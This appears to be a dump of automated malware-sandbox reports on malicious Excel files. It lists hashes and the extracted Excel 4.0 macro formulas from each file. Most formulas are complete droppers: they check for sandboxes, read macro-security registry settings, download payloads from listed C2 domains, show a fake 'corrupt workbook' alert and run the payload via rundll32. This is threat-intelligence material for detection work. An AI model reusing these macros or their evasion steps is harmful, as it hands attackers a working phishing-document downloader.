{"version":"0.2","sample":{"sample":"","kind":"file","target":"65462617248cf31deba55cac9d236a6fbcdd9283ad0996feb2ab035a432830bb"},"analysis":{"reported":"2020-04-09T16:16:41Z","score":10},"files":[{"filename":"65462617248cf31deba55cac9d236a6fbcdd9283ad0996feb2ab035a432830bb","filesize":206336,"md5":"d3f56b6115f65cb4c8579d1ac3facc44","sha1":"4c8b1829cb8e17abd13667625c1641fc0a96f30a","sha256":"65462617248cf31deba55cac9d236a6fbcdd9283ad0996feb2ab035a432830bb","sha512":"404f58877bfb80003e2060a3cd9a9ca0dd8e9f2575bcb0cc36f5b150a587f63f5502f769d1c0564149d061cba472c622560f78722db549f1afb004521164484e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"65462617248cf31deba55cac9d236a6fbcdd9283ad0996feb2ab035a432830bb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6Uu2FNeEXp\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"655187c22bedd6753823ec8a9c169e1a38598a930dfc1ab5c67e7d2e2d8aa9db"},"analysis":{"reported":"2020-04-09T16:16:42Z","score":10},"files":[{"filename":"655187c22bedd6753823ec8a9c169e1a38598a930dfc1ab5c67e7d2e2d8aa9db","filesize":186368,"md5":"5fbf5571dd6a0165cf2c6093ef62860f","sha1":"8cef3b463c7aee9f77d5ceab22b34accee101992","sha256":"655187c22bedd6753823ec8a9c169e1a38598a930dfc1ab5c67e7d2e2d8aa9db","sha512":"e71ab4c2f89036dee49e49b77cb672e8c712777fc62e31533e713e5a120855c06149c03992518b7b191606f45ec7f23e945f368b978102ecb99615d419c558d5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"655187c22bedd6753823ec8a9c169e1a38598a930dfc1ab5c67e7d2e2d8aa9db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nGET.WORKSPACE(1)\nGET.WORKSPACE(32)\nGET.WINDOW(1)\nIF(GET.WORKSPACE(19),CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,GET.NOTE(R$5C$4),GET.NOTE(R$8C$5),0,0),CLOSE(TRUE))\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$10C$3)),)\nCLOSE(TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"655761961a7e61b9ee97fe1dab7a38413136457b31703a0dfc3b5263e886fc4d"},"analysis":{"reported":"2020-04-09T16:16:42Z","score":10},"files":[{"filename":"655761961a7e61b9ee97fe1dab7a38413136457b31703a0dfc3b5263e886fc4d","filesize":206336,"md5":"171eec9020fcdc8a64c97d7597c9d2e1","sha1":"1aa0397d4394d432e21ab77467830b3d4a0e59a3","sha256":"655761961a7e61b9ee97fe1dab7a38413136457b31703a0dfc3b5263e886fc4d","sha512":"d7e16813f6796e346d989d4cf5ada128739867b97ee43f7f267750439aa0de4ec0173ea146095b3150394f4dc96769df4f20e06128e6c3cf4b708870790822e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"655761961a7e61b9ee97fe1dab7a38413136457b31703a0dfc3b5263e886fc4d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YwRHCERQLc\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"655cc21d1663f36b0d5257d397a6b7bb9ccac6d33ddebcacb3c36b046ecad1a5"},"analysis":{"reported":"2020-04-09T16:16:42Z","score":10},"files":[{"filename":"655cc21d1663f36b0d5257d397a6b7bb9ccac6d33ddebcacb3c36b046ecad1a5","filesize":226304,"md5":"a7c4772c8488752ebcc27c2263602c24","sha1":"3df0a1f46e537451030f3f53f7842c683d39e9fa","sha256":"655cc21d1663f36b0d5257d397a6b7bb9ccac6d33ddebcacb3c36b046ecad1a5","sha512":"530c6000d1d4616aca1b955ec4fb202f2428734f2c35c41da5e2c6517f17a107f9acc39ddea7ee3a71b4d2cf9311e83128b816d0bbc0f2253f0f77d47a92a8ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"655cc21d1663f36b0d5257d397a6b7bb9ccac6d33ddebcacb3c36b046ecad1a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zEVPRkigmF\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"658320f6326c37299bb88ff6a086c912fe78f4655c26b89730d4deada4be7867"},"analysis":{"reported":"2020-04-09T16:16:42Z","score":10},"files":[{"filename":"658320f6326c37299bb88ff6a086c912fe78f4655c26b89730d4deada4be7867","filesize":168960,"md5":"30bc9e252e24d74ae15181bd42628ff1","sha1":"8c001736c5c5fc90346d42645be4b0351bd94d0f","sha256":"658320f6326c37299bb88ff6a086c912fe78f4655c26b89730d4deada4be7867","sha512":"ef227adc5071196cba34eee28637cc704d2d1061b2d0be7daf03bc70fa11676f0123c44c763dbb8b34cdefcbf0340a02d9def22def293cf25acca696effe336a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"658320f6326c37299bb88ff6a086c912fe78f4655c26b89730d4deada4be7867.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DCMlSjc3tx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"658678121fca02df64efa7489cbb910045a8ae36a1abe715b9c99e69c69c6687"},"analysis":{"reported":"2020-04-09T16:16:42Z","score":10},"files":[{"filename":"658678121fca02df64efa7489cbb910045a8ae36a1abe715b9c99e69c69c6687","filesize":167936,"md5":"1688111e6450e9c41060ab7817f1e36b","sha1":"43aa864adcd0d5579b72b85bb542eef3a7f365c7","sha256":"658678121fca02df64efa7489cbb910045a8ae36a1abe715b9c99e69c69c6687","sha512":"621208b07c1d0b921d817b816515755bccc344390d923a5d0289df279d8b8abfa1d0b980c97766ba96152343c4608ec93892f86d70560374c78bbbd14f920e34","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"658678121fca02df64efa7489cbb910045a8ae36a1abe715b9c99e69c69c6687.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3ok6MG1SjL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"658905df40c016c206b1560e6fe57b34fe167ce72b00865f5606ae3c0b50f2ad"},"analysis":{"reported":"2020-04-09T16:16:42Z","score":10},"files":[{"filename":"658905df40c016c206b1560e6fe57b34fe167ce72b00865f5606ae3c0b50f2ad","filesize":112128,"md5":"1702865b7c6c4c632f73cf78417719ee","sha1":"64c2c37cafda675f5f6a0ffe9ab0ec6bff6ad123","sha256":"658905df40c016c206b1560e6fe57b34fe167ce72b00865f5606ae3c0b50f2ad","sha512":"8d781fec7bcff7f06576cc365c040544d64cd8e6ed6181d265899a92ca76557b636553b6cfac4cfd9d4b5563a1b0cfeaae9ba23ec5d800c7a945fc5ea7595192","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"658905df40c016c206b1560e6fe57b34fe167ce72b00865f5606ae3c0b50f2ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"658c7b2fb251150817adc6dc265b26296316ce331053a3485d0b7b8d27d875d4"},"analysis":{"reported":"2020-04-09T16:16:42Z","score":10},"files":[{"filename":"658c7b2fb251150817adc6dc265b26296316ce331053a3485d0b7b8d27d875d4","filesize":160768,"md5":"636156457c3ed4a3d9cf517af79d3403","sha1":"d3329e4ce7c4b8ca708cb0ecddc991abdc1b1719","sha256":"658c7b2fb251150817adc6dc265b26296316ce331053a3485d0b7b8d27d875d4","sha512":"70d7a55f2e69d744379674f5ca318908b1774ea2d877e6f0bac5b58f8d2a6d6d4e695883bc5872b6628c595753e38122d5d5bbf4f14a0f5427675a452f7ffe4c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"658c7b2fb251150817adc6dc265b26296316ce331053a3485d0b7b8d27d875d4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"z1pUHjsn1t\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"659f41109ba97fbd06399fcdf5cdd159aae847ebdb3c612de035fbb1d13893fe"},"analysis":{"reported":"2020-04-09T16:16:42Z","score":10},"files":[{"filename":"659f41109ba97fbd06399fcdf5cdd159aae847ebdb3c612de035fbb1d13893fe","filesize":225280,"md5":"11365e284472dda4c5d05becd8f648bc","sha1":"3e876a99bc099fd79a2aaf127dd0024f6efe0bc2","sha256":"659f41109ba97fbd06399fcdf5cdd159aae847ebdb3c612de035fbb1d13893fe","sha512":"5646156dce1703bbad63cdbbd465d5475061d5ef42ea673bab24795f71820541c074ed1b4109f92b913a3e20ab4b915766be2823107407c3168bb047696582f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"659f41109ba97fbd06399fcdf5cdd159aae847ebdb3c612de035fbb1d13893fe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FawmIntVM8\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"65afc0fe1bcecdb8cd1f15cfa55011caa1ea4b57d0206d088949517eace4a766"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"65afc0fe1bcecdb8cd1f15cfa55011caa1ea4b57d0206d088949517eace4a766","filesize":168960,"md5":"d2fb22a613c42315dca010a318e05dde","sha1":"a1c4de017f1cfcad4e2f31ef65c73ba0e6774837","sha256":"65afc0fe1bcecdb8cd1f15cfa55011caa1ea4b57d0206d088949517eace4a766","sha512":"4d3c3dabaaec8a588e95cfad7889fae9994317efe36167c0a9c9c474484bd0433068dc77ed01191c26fd22f6e3b98abdab6a98b02055dc3628bbd6b7ca57c14a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"65afc0fe1bcecdb8cd1f15cfa55011caa1ea4b57d0206d088949517eace4a766.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OhqRbD81zf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"65e31d07b5d91baf1fc46daca9f8cc7b1a0b4c5b1048662cd1fb260ebd5d9e09"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"65e31d07b5d91baf1fc46daca9f8cc7b1a0b4c5b1048662cd1fb260ebd5d9e09","filesize":110592,"md5":"0c0095e5b40bc7af93ea14afcc5bdf5a","sha1":"320412d7e12023bdb7c711a578d3d1b10f68e50e","sha256":"65e31d07b5d91baf1fc46daca9f8cc7b1a0b4c5b1048662cd1fb260ebd5d9e09","sha512":"c8adb2a13785bbfb89c95258758cc11dae010f8acfb0b747cfc86a26c10959df3a143e6e038979792d5d00b74a2ade94a84b6828955d6fe57ab188ddea708967","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"65e31d07b5d91baf1fc46daca9f8cc7b1a0b4c5b1048662cd1fb260ebd5d9e09.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HALT()\nRETURN()\nRETURN()\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"65ec488c1dae0e18283852274d93a515fe60c0457b2ff1912b559863d8022ed4"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"65ec488c1dae0e18283852274d93a515fe60c0457b2ff1912b559863d8022ed4","filesize":145920,"md5":"75519e8952153ce5238588ed3c4596a1","sha1":"720855244d91fa3d93bc1460d0604dce1dd2b69a","sha256":"65ec488c1dae0e18283852274d93a515fe60c0457b2ff1912b559863d8022ed4","sha512":"283d277b0bffe037bb5702dd5a909ab542bea6879e9890f07fee30b5533e90e6a362afdd27afe35aa4b42b8b89c372f7b0396a19f26821e58d4d64be325d6921","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"65ec488c1dae0e18283852274d93a515fe60c0457b2ff1912b559863d8022ed4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"T4bboYeN16\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"65ee7f5d0e3b42853df7b1252755d2e5e84a4230ca443bb55065de750467c02a"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"65ee7f5d0e3b42853df7b1252755d2e5e84a4230ca443bb55065de750467c02a","filesize":170496,"md5":"f4ee74f33ca5b32353ef5a34018fb034","sha1":"088e56a9ca7365c73fa19bc45cdea9f4d3f1a874","sha256":"65ee7f5d0e3b42853df7b1252755d2e5e84a4230ca443bb55065de750467c02a","sha512":"034c305cb63fe4dfceb51a21a4b1620fac81180c622952d6b9a339027ea27dd5ead32265736f5ec97888bc7c0762b086ac61f5cd1b1f50fe12e06ce16e227364","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"65ee7f5d0e3b42853df7b1252755d2e5e84a4230ca443bb55065de750467c02a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2vbFpnws1X\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"65fff690265fed10bef8fb6729abce8b838736b3e4e1f7cf3fee7ac7f8a8e3fd"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"65fff690265fed10bef8fb6729abce8b838736b3e4e1f7cf3fee7ac7f8a8e3fd","filesize":167936,"md5":"5357c08273afdb1f2bea0f79c606c214","sha1":"a432769ee5b45826464eb3342184762516a92905","sha256":"65fff690265fed10bef8fb6729abce8b838736b3e4e1f7cf3fee7ac7f8a8e3fd","sha512":"3ebf2effd6cf5733c82f0fc1564cabed7494260b4a29da5f0b3431862c376f33e2f16a3e2828973e014dbaf4d17f0b78229712195c23fb3560317e1d768bbebc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"65fff690265fed10bef8fb6729abce8b838736b3e4e1f7cf3fee7ac7f8a8e3fd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dCyKxfmdeh\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"660a96c92b6e5dc56f515d4cce0509aec549fa00f843ac3e3410ddab8490d06f"},"analysis":{"reported":"2020-04-09T16:16:43Z","score":10},"files":[{"filename":"660a96c92b6e5dc56f515d4cce0509aec549fa00f843ac3e3410ddab8490d06f","filesize":209408,"md5":"5305b1484326e37fae18130a218acbce","sha1":"d8a00d37c5e8288ecb82f84ed9b4e8e23c092bd5","sha256":"660a96c92b6e5dc56f515d4cce0509aec549fa00f843ac3e3410ddab8490d06f","sha512":"1d0d4a714eea78b22d2285aa7039ec82b40e8e854f4fdc73cb47e6caa1a435d753a0f97badc2c4115fe795f15365cc76ae235e8204b935c722d9a1d4a0094c7d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"660a96c92b6e5dc56f515d4cce0509aec549fa00f843ac3e3410ddab8490d06f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qA0nBMt3k4\",TRUE)\nGOTO(R$1C$10)"}}}]}
